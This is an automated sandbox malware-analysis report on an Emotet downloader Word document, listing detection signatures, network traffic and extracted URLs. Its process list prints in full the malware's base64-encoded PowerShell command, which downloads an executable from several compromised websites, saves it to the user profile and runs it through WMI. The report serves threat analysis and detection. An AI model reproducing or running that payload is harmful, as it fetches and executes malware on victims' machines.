Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen2.12176.26135.29106

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen2.12176.26135.29106 (renamed file extension from 29106 to doc)
Analysis ID:255722
MD5:3158d249b1df418410378fb0a8acc3d3
SHA1:0b1a3f8ee1317f9001eaf098a8de861859d5ceac
SHA256:774c827f086962222073ad050dfa5b10e8cc0411731e506edc4a0363f4a2815d

Most interesting Screenshot:

Detection

Emotet
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet Downloader
Creates HTML files with .exe extension (expired dropper behavior)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
PowerShell case anomaly found
Very long command line found
Allocates a big amount of memory (probably used for heap spraying)
Contains long sleeps (>= 3 min)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 5204 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6192 cmdline: powersheLL -e JABVAE0AQwBOAEwAbQBmAGUAPQAnAFIAVABFAE8ATQBjAGYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAFIASQBUAGAAeQBgAHAAcgBPAGAAVABvAEMATwBsACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQARQBEAE8AQQBXAGwAcQB2ACAAPQAgACcANwA0ADQAJwA7ACQASwBCAEEATgBIAGsAbQBvAD0AJwBaAEEARgBFAEIAdABxAHAAJwA7ACQAQwBRAEMAQwBXAHoAdwBuAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABFAEQATwBBAFcAbABxAHYAKwAnAC4AZQB4AGUAJwA7ACQAUABGAFAAVwBTAG0AZgB0AD0AJwBRAFEATQBVAFQAcwBiAGwAJwA7ACQATwBDAEQAWABEAHcAZQBrAD0ALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAEUAVAAuAFcARQBiAGMAbABJAGUATgBUADsAJABNAFgAWgBLAFUAYQBxAHIAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBoAGEAdABjAGgAZABvAGcAcwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBYAEkAdwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBvAG8AdgB5AGIAbwBvAHYAZQAuAGMAbwAuAHUAawAvAGIAbABvAGcAcwAvADgAVAA5ADQAbQBtAGQAawBhADEAMwAvACoAaAB0AHQAcABzADoALwAvAGcAcgBlAGcAZQBtAGUAcgBzAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaAB1AGQAeQAxADcAMgA0ADAALwAqAGgAdAB0AHAAOgAvAC8AZwB1AGEAcgBpAHoALgBjAG8AbQAuAGIAcgAvAFcAdQB1AHQAagBsAE8ALwAqAGgAdAB0AHAAOgAvAC8AaABhAGYAZABlAHIALgBjAG8AbQAvAGkAbQBhAGcAZQBzAC8AZgBoAHEANwBoADcAYgBhAGIAZABiAGUANQBxADUAMAA1ADIALwAnAC4AIgBTAHAATABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAWQBVAEMAWgB5AHMAZQA9ACcATABPAEQAVQBWAG0AcgBuACcAOwBmAG8AcgBlAGEAYwBoACgAJABaAFgAUgBWAFgAcABsAGIAIABpAG4AIAAkAE0AWABaAEsAVQBhAHEAcgApAHsAdAByAHkAewAkAE8AQwBEAFgARAB3AGUAawAuACIAZABPAGAAVwBuAGAAbABgAE8AYQBEAEYAaQBMAEUAIgAoACQAWgBYAFIAVgBYAHAAbABiACwAIAAkAEMAUQBDAEMAVwB6AHcAbgApADsAJABaAE4ASQBOAEkAbgB6AHcAPQAnAEEARQBHAE4ARABwAHkAdwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAEMAUQBDAEMAVwB6AHcAbgApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMwAyADkANQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAEUAYABBAHQAZQAiACgAJABDAFEAQwBDAFcAegB3AG4AKQA7ACQATQBGAFIARQBOAGIAdABlAD0AJwBWAFYAWgBDAEcAZABiAHkAJwA7AGIAcgBlAGEAawA7ACQARwBQAEcARABDAGEAcgB6AD0AJwBYAEwATwBWAFkAdgB4AGIAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASQBKAFUATQBQAGkAcgBhAD0AJwBCAEMAQQBKAEIAcQBtAHAAJwA= MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200802\PowerShell_transcript.813435.MH5mPmJJ.20200802003123.txtPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x23:$s1: PowerShell
  • 0xff:$s1: powersheLL
  • 0xfa0:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xfa0:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xfa0:$sn3: PowerShell
  • 0x101:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.813435.MH5mPmJJ.20200802003123.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: winword.exeMemory has grown: Private usage: 0MB later: 64MB
    Source: global trafficDNS query: name: www.hatchdogs.com
    Source: global trafficTCP traffic: 192.168.2.5:49742 -> 149.255.60.149:443
    Source: global trafficTCP traffic: 192.168.2.5:49741 -> 143.95.43.98:80

    Networking:

    barindex
    Creates HTML files with .exe extension (expired dropper behavior)Show sources
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: 744.exe.1.dr
    Source: global trafficHTTP traffic detected: GET /assets/XIw/ HTTP/1.1Host: www.hatchdogs.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: www.hatchdogs.com
    Source: global trafficHTTP traffic detected: GET /assets/XIw/ HTTP/1.1Host: www.hatchdogs.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cgi-sys/suspendedpage.cgi HTTP/1.1Host: www.hatchdogs.com
    Source: 744.exe.1.drString found in binary or memory: <li><a href="https://www.facebook.com/groovyboove" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="https://www.twitter.com/groovyboove" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="https://www.instagram.com/groovyboove" target="_blank"><i class="fa fa-instagram"></i></a></li></ul> equals www.facebook.com (Facebook)
    Source: 744.exe.1.drString found in binary or memory: <li><a href="https://www.facebook.com/groovyboove" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="https://www.twitter.com/groovyboove" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="https://www.instagram.com/groovyboove" target="_blank"><i class="fa fa-instagram"></i></a></li></ul> equals www.twitter.com (Twitter)
    Source: 744.exe.1.drString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/groovyboove" /> equals www.facebook.com (Facebook)
    Source: 744.exe.1.drString found in binary or memory: <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.groovyboove.co.uk/#organization","name":"Groovyboove Photo Booth Liverpool Wirral Chester Merseyside Cheshire Lancashire","url":"https://www.groovyboove.co.uk/","sameAs":["https://www.facebook.com/groovyboove","https://www.instagram.com/groovyboove","https://twitter.com/groovyboove"],"logo":{"@type":"ImageObject","@id":"https://www.groovyboove.co.uk/#logo","inLanguage":"en-US","url":"https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/BeFunky-collage.jpg?fit=2000%2C1111&ssl=1","width":2000,"height":1111,"caption":"Groovyboove Photo Booth Liverpool Wirral Chester Merseyside Cheshire Lancashire"},"image":{"@id":"https://www.groovyboove.co.uk/#logo"}},{"@type":"WebSite","@id":"https://www.groovyboove.co.uk/#website","url":"https://www.groovyboove.co.uk/","name":"PHOTO BOOTH HIRE - GROOVYBOOVE - WIRRAL - LIVERPOOL","description":"Photo Booth Hire In Liverpool Wirral Merseyside Cheshire Lancashire &amp; North Wales Chester","publisher":{"@id":"https://www.groovyboove.co.uk/#organization"},"potentialAction":[{"@type":"SearchAction","target":"https://www.groovyboove.co.uk/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https://www.groovyboove.co.uk/#primaryimage","inLanguage":"en-US","url":"https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?fit=480%2C480&ssl=1","width":480,"height":480},{"@type":"WebPage","@id":"https://www.groovyboove.co.uk/#webpage","url":"https://www.groovyboove.co.uk/","name":"PHOTO BOOTH HIRE FROM \u00a3180 &#8902; PARTY &#8902; WEDDING & EVENTS &#8902;","isPartOf":{"@id":"https://www.groovyboove.co.uk/#website"},"about":{"@id":"https://www.groovyboove.co.uk/#organization"},"primaryImageOfPage":{"@id":"https://www.groovyboove.co.uk/#primaryimage"},"datePublished":"2019-05-12T20:54:32+00:00","dateModified":"2020-07-20T17:51:19+00:00","description":"LOW PRICED AWARD WINNING PHOTO BOOTH HIRE IN LIVERPOOL, WIRRAL, CHESHIRE, LANCASHIRE & NORTH WALES - BOOK TODAY & GET A FREE ALBUM ON 2 OR 3 HR HIRES.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.groovyboove.co.uk/"]}]}]}</script> equals www.facebook.com (Facebook)
    Source: 744.exe.1.drString found in binary or memory: <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.groovyboove.co.uk/#organization","name":"Groovyboove Photo Booth Liverpool Wirral Chester Merseyside Cheshire Lancashire","url":"https://www.groovyboove.co.uk/","sameAs":["https://www.facebook.com/groovyboove","https://www.instagram.com/groovyboove","https://twitter.com/groovyboove"],"logo":{"@type":"ImageObject","@id":"https://www.groovyboove.co.uk/#logo","inLanguage":"en-US","url":"https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/BeFunky-collage.jpg?fit=2000%2C1111&ssl=1","width":2000,"height":1111,"caption":"Groovyboove Photo Booth Liverpool Wirral Chester Merseyside Cheshire Lancashire"},"image":{"@id":"https://www.groovyboove.co.uk/#logo"}},{"@type":"WebSite","@id":"https://www.groovyboove.co.uk/#website","url":"https://www.groovyboove.co.uk/","name":"PHOTO BOOTH HIRE - GROOVYBOOVE - WIRRAL - LIVERPOOL","description":"Photo Booth Hire In Liverpool Wirral Merseyside Cheshire Lancashire &amp; North Wales Chester","publisher":{"@id":"https://www.groovyboove.co.uk/#organization"},"potentialAction":[{"@type":"SearchAction","target":"https://www.groovyboove.co.uk/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https://www.groovyboove.co.uk/#primaryimage","inLanguage":"en-US","url":"https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/06/10632.jpg?fit=480%2C480&ssl=1","width":480,"height":480},{"@type":"WebPage","@id":"https://www.groovyboove.co.uk/#webpage","url":"https://www.groovyboove.co.uk/","name":"PHOTO BOOTH HIRE FROM \u00a3180 &#8902; PARTY &#8902; WEDDING & EVENTS &#8902;","isPartOf":{"@id":"https://www.groovyboove.co.uk/#website"},"about":{"@id":"https://www.groovyboove.co.uk/#organization"},"primaryImageOfPage":{"@id":"https://www.groovyboove.co.uk/#primaryimage"},"datePublished":"2019-05-12T20:54:32+00:00","dateModified":"2020-07-20T17:51:19+00:00","description":"LOW PRICED AWARD WINNING PHOTO BOOTH HIRE IN LIVERPOOL, WIRRAL, CHESHIRE, LANCASHIRE & NORTH WALES - BOOK TODAY & GET A FREE ALBUM ON 2 OR 3 HR HIRES.","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.groovyboove.co.uk/"]}]}]}</script> equals www.twitter.com (Twitter)
    Source: unknownDNS traffic detected: queries for: www.hatchdogs.com
    Source: 744.exe.1.drString found in binary or memory: http://gmpg.org/xfn/11
    Source: PowerShell_transcript.813435.MH5mPmJJ.20200802003123.txt.1.drString found in binary or memory: http://guariz.com.br/WuutjlO/
    Source: PowerShell_transcript.813435.MH5mPmJJ.20200802003123.txt.1.drString found in binary or memory: http://hafder.com/images/fhq7h7babdbe5q5052/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: PowerShell_transcript.813435.MH5mPmJJ.20200802003123.txt.1.drString found in binary or memory: http://www.hatchdogs.com/assets/XIw/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://api.aadrm.com/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://api.onedrive.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 744.exe.1.drString found in binary or memory: https://api.w.org/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://app.powerbi.com/taskpane.html
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://augloop.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/css/dist/block-library/style.min.css
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/css/dist/block-library/theme.min.css
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/dist/a11y.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/dist/dom-ready.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/dist/vendor/wp-polyfill.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/imagesloaded.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/jquery/jquery-migrate.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/jquery/jquery.form.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/jquery/jquery.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/underscore.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/wp-custom-header.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/c/5.4.2/wp-includes/js/wp-embed.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/p/jetpack/8.7.1/_inc/build/carousel/jetpack-carousel.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/p/jetpack/8.7.1/_inc/build/lazy-images/js/lazy-images.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/p/jetpack/8.7.1/_inc/build/photon/photon.min.js
    Source: 744.exe.1.drString found in binary or memory: https://c0.wp.com/p/jetpack/8.7.1/css/jetpack.css
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://cdn.entity.
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://clients.config.office.net/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://config.edge.skype.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://cortana.ai
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://cr.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 744.exe.1.drString found in binary or memory: https://dfactory.eu/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://directory.services.
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 744.exe.1.drString found in binary or memory: https://embed.tawk.to/5e0d2ef827773e0d832b7068/default
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://graph.windows.net
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://graph.windows.net/
    Source: PowerShell_transcript.813435.MH5mPmJJ.20200802003123.txt.1.drString found in binary or memory: https://gregemerson.com/wp-includes/hudy17240/
    Source: PowerShell_transcript.813435.MH5mPmJJ.20200802003123.txt.1.drString found in binary or memory: https://groovyboove.co.uk/blogs/8T94mmdka13/
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: B50BF7D1-C682-4677-B189-4BD00863A25B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?fit=300%2C68&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?fit=600%2C136&amp;ssl=
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?resize=300%2C68&amp;ss
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?w=600&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?w=800&#038;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/01/AWARDS.jpg?w=800&amp;is-pending-l
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?fit=274%2C300
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?fit=320%2C351
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?resize=274%2C
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?w=320&amp;ssl
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?w=800&#038;ss
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/1-Medium-Mobile.jpg?w=800&amp;is-
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?fit=300%2C105&amp;ssl
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?fit=600%2C209&amp;ssl
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?resize=300%2C105&amp;
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?w=600&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?w=800&#038;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i0.wp.com/www.groovyboove.co.uk/wp-content/uploads/2020/02/glitter.jpg?w=800&amp;is-pending-
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?fit=2000%2C1111&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?fit=300%2C167&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?fit=800%2C445&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?resize=1024%2C569&amp;ssl
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?resize=300%2C167&amp;ssl=
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?resize=768%2C427&amp;ssl=
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?resize=800%2C445&#038;ssl
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?resize=800%2C445&amp;is-p
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?w=1600&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/08/FUN.png?w=2000&amp;ssl=1
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/09/cropped-GB-1.jpg?fit=180%2C180&#0
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/09/cropped-GB-1.jpg?fit=192%2C192&#0
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/09/cropped-GB-1.jpg?fit=270%2C270&#0
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/09/cropped-GB-1.jpg?fit=32%2C32&#038
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/10/LOGO-MASTER.jpg?fit=300%2C179&amp
    Source: 744.exe.1.drString found in binary or memory: https://i1.wp.com/www.groovyboove.co.uk/wp-content/uploads/2019/10/LOGO-MASTER.jpg?fit=600%2C357&amp
